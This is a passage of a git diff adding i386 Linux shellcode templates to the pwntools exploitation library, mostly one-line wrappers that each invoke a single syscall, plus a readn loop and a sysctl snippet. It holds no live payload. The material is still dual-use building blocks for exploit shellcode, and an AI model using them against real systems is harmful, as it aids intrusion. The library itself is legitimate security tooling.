0 or address where to store old value */ + size_t *oldlenp; /* available room for old value, + overwritten by actual size of old value */ + void *newval; /* 0 or address of new value */ + size_t newlen; /* size of new value */ +}; +""" +%> + push ebp + ${push(0xffff)} + mov ebp, esp /* ebp = oldval and frame pointer R*/ + ${push(4)} + mov eax, esp /* eax = oldlenp */ + ${push(CTL_KERN)} + ${push(KERN_PIDMAX)} + mov ecx, esp /* ecx = name */ + ${push(0)} /* newlen */ + ${push(0)} /* newval */ + ${push('eax')} /* oldlenp */ + ${push('ebp')} /* oldval */ + ${push(2)} /* nlen */ + ${push('ecx')} /* name */ + ${syscall('SYS__sysctl', 'esp')} + mov esp, ebp + pop eax + pop ebp diff --git a/pwnlib/shellcraft/templates/i386/linux/pipe.asm b/pwnlib/shellcraft/templates/i386/linux/pipe.asm new file mode 100644 index 000000000..6bc12d7dc --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/pipe.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="pipedes"/> +<%docstring> +Invokes the syscall pipe. See 'man 2 pipe' for more information. + +Arguments: + pipedes(int): pipedes + + + ${syscall('SYS_pipe', pipedes)} diff --git a/pwnlib/shellcraft/templates/i386/linux/pipe2.asm b/pwnlib/shellcraft/templates/i386/linux/pipe2.asm new file mode 100644 index 000000000..7dc8cd094 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/pipe2.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="pipedes, flags"/> +<%docstring> +Invokes the syscall pipe2. See 'man 2 pipe2' for more information. + +Arguments: + pipedes(int): pipedes + flags(int): flags + + + ${syscall('SYS_pipe2', pipedes, flags)} diff --git a/pwnlib/shellcraft/templates/i386/linux/poll.asm b/pwnlib/shellcraft/templates/i386/linux/poll.asm new file mode 100644 index 000000000..b0ad603a6 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/poll.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fds, nfds, timeout"/> +<%docstring> +Invokes the syscall poll. See 'man 2 poll' for more information. + +Arguments: + fds(pollfd): fds + nfds(nfds_t): nfds + timeout(int): timeout + + + ${syscall('SYS_poll', fds, nfds, timeout)} diff --git a/pwnlib/shellcraft/templates/i386/linux/ppoll.asm b/pwnlib/shellcraft/templates/i386/linux/ppoll.asm new file mode 100644 index 000000000..b59e0cbe0 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/ppoll.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fds, nfds, timeout, ss"/> +<%docstring> +Invokes the syscall ppoll. See 'man 2 ppoll' for more information. + +Arguments: + fds(pollfd): fds + nfds(nfds_t): nfds + timeout(timespec): timeout + ss(sigset_t): ss + + + ${syscall('SYS_ppoll', fds, nfds, timeout, ss)} diff --git a/pwnlib/shellcraft/templates/i386/linux/prctl.asm b/pwnlib/shellcraft/templates/i386/linux/prctl.asm new file mode 100644 index 000000000..45f85efd9 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/prctl.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="option, *vararg"/> +<%docstring> +Invokes the syscall prctl. See 'man 2 prctl' for more information. + +Arguments: + option(int): option + vararg(int): vararg + + + ${syscall('SYS_prctl', option, *vararg)} diff --git a/pwnlib/shellcraft/templates/i386/linux/pread.asm b/pwnlib/shellcraft/templates/i386/linux/pread.asm new file mode 100644 index 000000000..f9032e71b --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/pread.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fd, buf, nbytes, offset"/> +<%docstring> +Invokes the syscall pread. See 'man 2 pread' for more information. + +Arguments: + fd(int): fd + buf(void): buf + nbytes(size_t): nbytes + offset(off_t): offset + + + ${syscall('SYS_pread', fd, buf, nbytes, offset)} diff --git a/pwnlib/shellcraft/templates/i386/linux/preadv.asm b/pwnlib/shellcraft/templates/i386/linux/preadv.asm new file mode 100644 index 000000000..2d06168b0 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/preadv.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fd, iovec, count, offset"/> +<%docstring> +Invokes the syscall preadv. See 'man 2 preadv' for more information. + +Arguments: + fd(int): fd + iovec(iovec): iovec + count(int): count + offset(off_t): offset + + + ${syscall('SYS_preadv', fd, iovec, count, offset)} diff --git a/pwnlib/shellcraft/templates/i386/linux/prlimit64.asm b/pwnlib/shellcraft/templates/i386/linux/prlimit64.asm new file mode 100644 index 000000000..0a9b347de --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/prlimit64.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="pid, resource, new_limit, old_limit"/> +<%docstring> +Invokes the syscall prlimit64. See 'man 2 prlimit64' for more information. + +Arguments: + pid(pid_t): pid + resource(rlimit_resource): resource + new_limit(rlimit64): new_limit + old_limit(rlimit64): old_limit + + + ${syscall('SYS_prlimit64', pid, resource, new_limit, old_limit)} diff --git a/pwnlib/shellcraft/templates/i386/linux/profil.asm b/pwnlib/shellcraft/templates/i386/linux/profil.asm new file mode 100644 index 000000000..72ec369da --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/profil.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="sample_buffer, size, offset, scale"/> +<%docstring> +Invokes the syscall profil. See 'man 2 profil' for more information. + +Arguments: + sample_buffer(unsigned): sample_buffer + size(size_t): size + offset(size_t): offset + scale(unsigned): scale + + + ${syscall('SYS_profil', sample_buffer, size, offset, scale)} diff --git a/pwnlib/shellcraft/templates/i386/linux/ptrace.asm b/pwnlib/shellcraft/templates/i386/linux/ptrace.asm new file mode 100644 index 000000000..955342e90 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/ptrace.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="request, *vararg"/> +<%docstring> +Invokes the syscall ptrace. See 'man 2 ptrace' for more information. + +Arguments: + request(ptrace_request): request + vararg(int): vararg + + + ${syscall('SYS_ptrace', request, *vararg)} diff --git a/pwnlib/shellcraft/templates/i386/linux/push.asm b/pwnlib/shellcraft/templates/i386/linux/push.asm index 99efdff4f..bea7ff03a 100644 --- a/pwnlib/shellcraft/templates/i386/linux/push.asm +++ b/pwnlib/shellcraft/templates/i386/linux/push.asm @@ -11,7 +11,7 @@ Thin wrapper around :func:`pwnlib.shellcraft.i386.push`, which sets Example: >>> print pwnlib.shellcraft.i386.linux.push('SYS_execve').rstrip() - /* push (SYS_execve) == 0xb */ + /* push (SYS_execve) (0xb) */ push 0xb diff --git a/pwnlib/shellcraft/templates/i386/linux/putpmsg.asm b/pwnlib/shellcraft/templates/i386/linux/putpmsg.asm new file mode 100644 index 000000000..5f8f2b0f3 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/putpmsg.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fildes, ctlptr, dataptr, band, flags"/> +<%docstring> +Invokes the syscall putpmsg. See 'man 2 putpmsg' for more information. + +Arguments: + fildes(int): fildes + ctlptr(strbuf): ctlptr + dataptr(strbuf): dataptr + band(int): band + flags(int): flags + + + ${syscall('SYS_putpmsg', fildes, ctlptr, dataptr, band, flags)} diff --git a/pwnlib/shellcraft/templates/i386/linux/pwrite.asm b/pwnlib/shellcraft/templates/i386/linux/pwrite.asm new file mode 100644 index 000000000..840667cf3 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/pwrite.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fd, buf, n, offset"/> +<%docstring> +Invokes the syscall pwrite. See 'man 2 pwrite' for more information. + +Arguments: + fd(int): fd + buf(void): buf + n(size_t): n + offset(off_t): offset + + + ${syscall('SYS_pwrite', fd, buf, n, offset)} diff --git a/pwnlib/shellcraft/templates/i386/linux/pwritev.asm b/pwnlib/shellcraft/templates/i386/linux/pwritev.asm new file mode 100644 index 000000000..35bc342d7 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/pwritev.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fd, iovec, count, offset"/> +<%docstring> +Invokes the syscall pwritev. See 'man 2 pwritev' for more information. + +Arguments: + fd(int): fd + iovec(iovec): iovec + count(int): count + offset(off_t): offset + + + ${syscall('SYS_pwritev', fd, iovec, count, offset)} diff --git a/pwnlib/shellcraft/templates/i386/linux/readahead.asm b/pwnlib/shellcraft/templates/i386/linux/readahead.asm new file mode 100644 index 000000000..8aa07b4fa --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/readahead.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fd, offset, count"/> +<%docstring> +Invokes the syscall readahead. See 'man 2 readahead' for more information. + +Arguments: + fd(int): fd + offset(off64_t): offset + count(size_t): count + + + ${syscall('SYS_readahead', fd, offset, count)} diff --git a/pwnlib/shellcraft/templates/i386/linux/readdir.asm b/pwnlib/shellcraft/templates/i386/linux/readdir.asm new file mode 100644 index 000000000..010c21986 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/readdir.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="dirp"/> +<%docstring> +Invokes the syscall readdir. See 'man 2 readdir' for more information. + +Arguments: + dirp(DIR): dirp + + + ${syscall('SYS_readdir', dirp)} diff --git a/pwnlib/shellcraft/templates/i386/linux/readlink.asm b/pwnlib/shellcraft/templates/i386/linux/readlink.asm new file mode 100644 index 000000000..6b16c1bb4 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/readlink.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="path, buf, len"/> +<%docstring> +Invokes the syscall readlink. See 'man 2 readlink' for more information. + +Arguments: + path(char): path + buf(char): buf + len(size_t): len + + + ${syscall('SYS_readlink', path, buf, len)} diff --git a/pwnlib/shellcraft/templates/i386/linux/readlinkat.asm b/pwnlib/shellcraft/templates/i386/linux/readlinkat.asm new file mode 100644 index 000000000..e983e244c --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/readlinkat.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fd, path, buf, len"/> +<%docstring> +Invokes the syscall readlinkat. See 'man 2 readlinkat' for more information. + +Arguments: + fd(int): fd + path(char): path + buf(char): buf + len(size_t): len + + + ${syscall('SYS_readlinkat', fd, path, buf, len)} diff --git a/pwnlib/shellcraft/templates/i386/linux/readn.asm b/pwnlib/shellcraft/templates/i386/linux/readn.asm new file mode 100644 index 000000000..c5f2dc3c9 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/readn.asm @@ -0,0 +1,23 @@ +<% + from pwnlib.shellcraft.i386.linux import read + from pwnlib.shellcraft.i386 import setregs + from pwnlib.shellcraft import common +%> +<%page args="fd, buf, nbytes"/> +<%docstring> +Reads exactly nbytes bytes from file descriptor fd into the buffer buf. + +Arguments: + fd(int): fd + buf(void): buf + nbytes(size_t): nbytes + +<% +readn_loop = common.label('readn_loop') +%> + ${setregs({'ecx': buf, 'edx': nbytes})} +${readn_loop}: + ${read(fd, 'ecx', 'edx')} + add ecx, eax + sub edx, eax + jnz ${readn_loop} diff --git a/pwnlib/shellcraft/templates/i386/linux/readv.asm b/pwnlib/shellcraft/templates/i386/linux/readv.asm new file mode 100644 index 000000000..b97ef8a7e --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/readv.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fd, iovec, count"/> +<%docstring> +Invokes the syscall readv. See 'man 2 readv' for more information. + +Arguments: + fd(int): fd + iovec(iovec): iovec + count(int): count + + + ${syscall('SYS_readv', fd, iovec, count)} diff --git a/pwnlib/shellcraft/templates/i386/linux/recv.asm b/pwnlib/shellcraft/templates/i386/linux/recv.asm new file mode 100644 index 000000000..04564ae67 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/recv.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fd, buf, n, flags"/> +<%docstring> +Invokes the syscall recv. See 'man 2 recv' for more information. + +Arguments: + fd(int): fd + buf(void): buf + n(size_t): n + flags(int): flags + + + ${syscall('SYS_recv', fd, buf, n, flags)} diff --git a/pwnlib/shellcraft/templates/i386/linux/recvfrom.asm b/pwnlib/shellcraft/templates/i386/linux/recvfrom.asm new file mode 100644 index 000000000..70563acd8 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/recvfrom.asm @@ -0,0 +1,18 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fd, buf, n, flags, addr, addr_len"/> +<%docstring> +Invokes the syscall recvfrom. See 'man 2 recvfrom' for more information. + +Arguments: + fd(int): fd + buf(void): buf + n(size_t): n + flags(int): flags + addr(SOCKADDR_ARG): addr + addr_len(socklen_t): addr_len + + + ${syscall('SYS_recvfrom', fd, buf, n, flags, addr, addr_len)} diff --git a/pwnlib/shellcraft/templates/i386/linux/recvmmsg.asm b/pwnlib/shellcraft/templates/i386/linux/recvmmsg.asm new file mode 100644 index 000000000..bcdfc8e0d --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/recvmmsg.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fd, vmessages, vlen, flags, tmo"/> +<%docstring> +Invokes the syscall recvmmsg. See 'man 2 recvmmsg' for more information. + +Arguments: + fd(int): fd + vmessages(mmsghdr): vmessages + vlen(unsigned): vlen + flags(int): flags + tmo(timespec): tmo + + + ${syscall('SYS_recvmmsg', fd, vmessages, vlen, flags, tmo)} diff --git a/pwnlib/shellcraft/templates/i386/linux/recvmsg.asm b/pwnlib/shellcraft/templates/i386/linux/recvmsg.asm new file mode 100644 index 000000000..ff15faefd --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/recvmsg.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fd, message, flags"/> +<%docstring> +Invokes the syscall recvmsg. See 'man 2 recvmsg' for more information. + +Arguments: + fd(int): fd + message(msghdr): message + flags(int): flags + + + ${syscall('SYS_recvmsg', fd, message, flags)} diff --git a/pwnlib/shellcraft/templates/i386/linux/remap_file_pages.asm b/pwnlib/shellcraft/templates/i386/linux/remap_file_pages.asm new file mode 100644 index 000000000..10406cef0 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/remap_file_pages.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="start, size, prot, pgoff, flags"/> +<%docstring> +Invokes the syscall remap_file_pages. See 'man 2 remap_file_pages' for more information. + +Arguments: + start(void): start + size(size_t): size + prot(int): prot + pgoff(size_t): pgoff + flags(int): flags + + + ${syscall('SYS_remap_file_pages', start, size, prot, pgoff, flags)} diff --git a/pwnlib/shellcraft/templates/i386/linux/rename.asm b/pwnlib/shellcraft/templates/i386/linux/rename.asm new file mode 100644 index 000000000..d9195a129 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/rename.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="old, new"/> +<%docstring> +Invokes the syscall rename. See 'man 2 rename' for more information. + +Arguments: + old(char): old + new(char): new + + + ${syscall('SYS_rename', old, new)} diff --git a/pwnlib/shellcraft/templates/i386/linux/renameat.asm b/pwnlib/shellcraft/templates/i386/linux/renameat.asm new file mode 100644 index 000000000..e78cc4696 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/renameat.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="oldfd, old, newfd, new"/> +<%docstring> +Invokes the syscall renameat. See 'man 2 renameat' for more information. + +Arguments: + oldfd(int): oldfd + old(char): old + newfd(int): newfd + new(char): new + + + ${syscall('SYS_renameat', oldfd, old, newfd, new)} diff --git a/pwnlib/shellcraft/templates/i386/linux/rmdir.asm b/pwnlib/shellcraft/templates/i386/linux/rmdir.asm new file mode 100644 index 000000000..11515ce61 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/rmdir.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="path"/> +<%docstring> +Invokes the syscall rmdir. See 'man 2 rmdir' for more information. + +Arguments: + path(char): path + + + ${syscall('SYS_rmdir', path)} diff --git a/pwnlib/shellcraft/templates/i386/linux/sched_get_priority_max.asm b/pwnlib/shellcraft/templates/i386/linux/sched_get_priority_max.asm new file mode 100644 index 000000000..87ff05cb6 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/sched_get_priority_max.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="algorithm"/> +<%docstring> +Invokes the syscall sched_get_priority_max. See 'man 2 sched_get_priority_max' for more information. + +Arguments: + algorithm(int): algorithm + + + ${syscall('SYS_sched_get_priority_max', algorithm)} diff --git a/pwnlib/shellcraft/templates/i386/linux/sched_get_priority_min.asm b/pwnlib/shellcraft/templates/i386/linux/sched_get_priority_min.asm new file mode 100644 index 000000000..9d81c3ab2 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/sched_get_priority_min.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="algorithm"/> +<%docstring> +Invokes the syscall sched_get_priority_min. See 'man 2 sched_get_priority_min' for more information. + +Arguments: + algorithm(int): algorithm + + + ${syscall('SYS_sched_get_priority_min', algorithm)} diff --git a/pwnlib/shellcraft/templates/i386/linux/sched_getaffinity.asm b/pwnlib/shellcraft/templates/i386/linux/sched_getaffinity.asm new file mode 100644 index 000000000..5d717bf8d --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/sched_getaffinity.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="pid, cpusetsize, cpuset"/> +<%docstring> +Invokes the syscall sched_getaffinity. See 'man 2 sched_getaffinity' for more information. + +Arguments: + pid(pid_t): pid + cpusetsize(size_t): cpusetsize + cpuset(cpu_set_t): cpuset + + + ${syscall('SYS_sched_getaffinity', pid, cpusetsize, cpuset)} diff --git a/pwnlib/shellcraft/templates/i386/linux/sched_getparam.asm b/pwnlib/shellcraft/templates/i386/linux/sched_getparam.asm new file mode 100644 index 000000000..77860b2d7 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/sched_getparam.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="pid, param"/> +<%docstring> +Invokes the syscall sched_getparam. See 'man 2 sched_getparam' for more information. + +Arguments: + pid(pid_t): pid + param(sched_param): param + + + ${syscall('SYS_sched_getparam', pid, param)} diff --git a/pwnlib/shellcraft/templates/i386/linux/sched_getscheduler.asm b/pwnlib/shellcraft/templates/i386/linux/sched_getscheduler.asm new file mode 100644 index 000000000..d997a9f80 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/sched_getscheduler.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="pid"/> +<%docstring> +Invokes the syscall sched_getscheduler. See 'man 2 sched_getscheduler' for more information. + +Arguments: + pid(pid_t): pid + + + ${syscall('SYS_sched_getscheduler', pid)} diff --git a/pwnlib/shellcraft/templates/i386/linux/sched_rr_get_interval.asm b/pwnlib/shellcraft/templates/i386/linux/sched_rr_get_interval.asm new file mode 100644 index 000000000..9c674dd8c --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/sched_rr_get_interval.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="pid, t"/> +<%docstring> +Invokes the syscall sched_rr_get_interval. See 'man 2 sched_rr_get_interval' for more information. + +Arguments: + pid(pid_t): pid + t(timespec): t + + + ${syscall('SYS_sched_rr_get_interval', pid, t)} diff --git a/pwnlib/shellcraft/templates/i386/linux/sched_setaffinity.asm b/pwnlib/shellcraft/templates/i386/linux/sched_setaffinity.asm new file mode 100644 index 000000000..8c64cda6a --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/sched_setaffinity.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="pid, cpusetsize, cpuset"/> +<%docstring> +Invokes the syscall sched_setaffinity. See 'man 2 sched_setaffinity' for more information. + +Arguments: + pid(pid_t): pid + cpusetsize(size_t): cpusetsize + cpuset(cpu_set_t): cpuset + + + ${syscall('SYS_sched_setaffinity', pid, cpusetsize, cpuset)} diff --git a/pwnlib/shellcraft/templates/i386/linux/sched_setparam.asm b/pwnlib/shellcraft/templates/i386/linux/sched_setparam.asm new file mode 100644 index 000000000..041ac374c --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/sched_setparam.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="pid, param"/> +<%docstring> +Invokes the syscall sched_setparam. See 'man 2 sched_setparam' for more information. + +Arguments: + pid(pid_t): pid + param(sched_param): param + + + ${syscall('SYS_sched_setparam', pid, param)} diff --git a/pwnlib/shellcraft/templates/i386/linux/sched_setscheduler.asm b/pwnlib/shellcraft/templates/i386/linux/sched_setscheduler.asm new file mode 100644 index 000000000..7d88ebb9d --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/sched_setscheduler.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="pid, policy, param"/> +<%docstring> +Invokes the syscall sched_setscheduler. See 'man 2 sched_setscheduler' for more information. + +Arguments: + pid(pid_t): pid + policy(int): policy + param(sched_param): param + + + ${syscall('SYS_sched_setscheduler', pid, policy, param)} diff --git a/pwnlib/shellcraft/templates/i386/linux/sched_yield.asm b/pwnlib/shellcraft/templates/i386/linux/sched_yield.asm new file mode 100644 index 000000000..2527ca1f1 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/sched_yield.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall sched_yield. See 'man 2 sched_yield' for more information. + +Arguments: + + + + ${syscall('SYS_sched_yield')} diff --git a/pwnlib/shellcraft/templates/i386/linux/select.asm b/pwnlib/shellcraft/templates/i386/linux/select.asm new file mode 100644 index 000000000..b943a457b --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/select.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="nfds, readfds, writefds, exceptfds, timeout"/> +<%docstring> +Invokes the syscall select. See 'man 2 select' for more information. + +Arguments: + nfds(int): nfds + readfds(fd_set): readfds + writefds(fd_set): writefds + exceptfds(fd_set): exceptfds + timeout(timeval): timeout + + + ${syscall('SYS_select', nfds, readfds, writefds, exceptfds, timeout)} diff --git a/pwnlib/shellcraft/templates/i386/linux/sendfile.asm b/pwnlib/shellcraft/templates/i386/linux/sendfile.asm new file mode 100644 index 000000000..2b0845e17 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/sendfile.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="out_fd, in_fd, offset, count"/> +<%docstring> +Invokes the syscall sendfile. See 'man 2 sendfile' for more information. + +Arguments: + out_fd(int): out_fd + in_fd(int): in_fd + offset(off_t): offset + count(size_t): count + + + ${syscall('SYS_sendfile', out_fd, in_fd, offset, count)} diff --git a/pwnlib/shellcraft/templates/i386/linux/sendfile64.asm b/pwnlib/shellcraft/templates/i386/linux/sendfile64.asm new file mode 100644 index 000000000..5197588a9 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/sendfile64.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="out_fd, in_fd, offset, count"/> +<%docstring> +Invokes the syscall sendfile64. See 'man 2 sendfile64' for more information. + +Arguments: + out_fd(int): out_fd + in_fd(int): in_fd + offset(off64_t): offset + count(size_t): count + + + ${syscall('SYS_sendfile64', out_fd, in_fd, offset, count)} diff --git a/pwnlib/shellcraft/templates/i386/linux/setdomainname.asm b/pwnlib/shellcraft/templates/i386/linux/setdomainname.asm new file mode 100644 index 000000000..5164efeec --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/setdomainname.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="name, len"/> +<%docstring> +Invokes the syscall setdomainname. See 'man 2 setdomainname' for more information. + +Arguments: + name(char): name + len(size_t): len + + + ${syscall('SYS_setdomainname', name, len)} diff --git a/pwnlib/shellcraft/templates/i386/linux/setgid.asm b/pwnlib/shellcraft/templates/i386/linux/setgid.asm new file mode 100644 index 000000000..ebea5dd73 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/setgid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="gid"/> +<%docstring> +Invokes the syscall setgid. See 'man 2 setgid' for more information. + +Arguments: + gid(gid_t): gid + + + ${syscall('SYS_setgid', gid)} diff --git a/pwnlib/shellcraft/templates/i386/linux/setgroups.asm b/pwnlib/shellcraft/templates/i386/linux/setgroups.asm new file mode 100644 index 000000000..ffa3f3c88 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/setgroups.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="n, groups"/> +<%docstring> +Invokes the syscall setgroups. See 'man 2 setgroups' for more information. + +Arguments: + n(size_t): n + groups(gid_t): groups + + + ${syscall('SYS_setgroups', n, groups)} diff --git a/pwnlib/shellcraft/templates/i386/linux/sethostname.asm b/pwnlib/shellcraft/templates/i386/linux/sethostname.asm new file mode 100644 index 000000000..0716109c5 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/sethostname.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="name, len"/> +<%docstring> +Invokes the syscall sethostname. See 'man 2 sethostname' for more information. + +Arguments: + name(char): name + len(size_t): len + + + ${syscall('SYS_sethostname', name, len)} diff --git a/pwnlib/shellcraft/templates/i386/linux/setitimer.asm b/pwnlib/shellcraft/templates/i386/linux/setitimer.asm new file mode 100644 index 000000000..add2bc5b0 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/setitimer.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="which, new, old"/> +<%docstring> +Invokes the syscall setitimer. See 'man 2 setitimer' for more information. + +Arguments: + which(itimer_which_t): which + new(itimerval): new + old(itimerval): old + + + ${syscall('SYS_setitimer', which, new, old)} diff --git a/pwnlib/shellcraft/templates/i386/linux/setpgid.asm b/pwnlib/shellcraft/templates/i386/linux/setpgid.asm new file mode 100644 index 000000000..5c9c426c5 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/setpgid.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="pid, pgid"/> +<%docstring> +Invokes the syscall setpgid. See 'man 2 setpgid' for more information. + +Arguments: + pid(pid_t): pid + pgid(pid_t): pgid + + + ${syscall('SYS_setpgid', pid, pgid)} diff --git a/pwnlib/shellcraft/templates/i386/linux/setpriority.asm b/pwnlib/shellcraft/templates/i386/linux/setpriority.asm new file mode 100644 index 000000000..57bfb3e73 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/setpriority.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="which, who, prio"/> +<%docstring> +Invokes the syscall setpriority. See 'man 2 setpriority' for more information. + +Arguments: + which(priority_which_t): which + who(id_t): who + prio(int): prio + + + ${syscall('SYS_setpriority', which, who, prio)} diff --git a/pwnlib/shellcraft/templates/i386/linux/setresgid.asm b/pwnlib/shellcraft/templates/i386/linux/setresgid.asm new file mode 100644 index 000000000..23e457382 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/setresgid.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="rgid, egid, sgid"/> +<%docstring> +Invokes the syscall setresgid. See 'man 2 setresgid' for more information. + +Arguments: + rgid(gid_t): rgid + egid(gid_t): egid + sgid(gid_t): sgid + + + ${syscall('SYS_setresgid', rgid, egid, sgid)} diff --git a/pwnlib/shellcraft/templates/i386/linux/setresuid.asm b/pwnlib/shellcraft/templates/i386/linux/setresuid.asm new file mode 100644 index 000000000..9777331b9 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/setresuid.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall 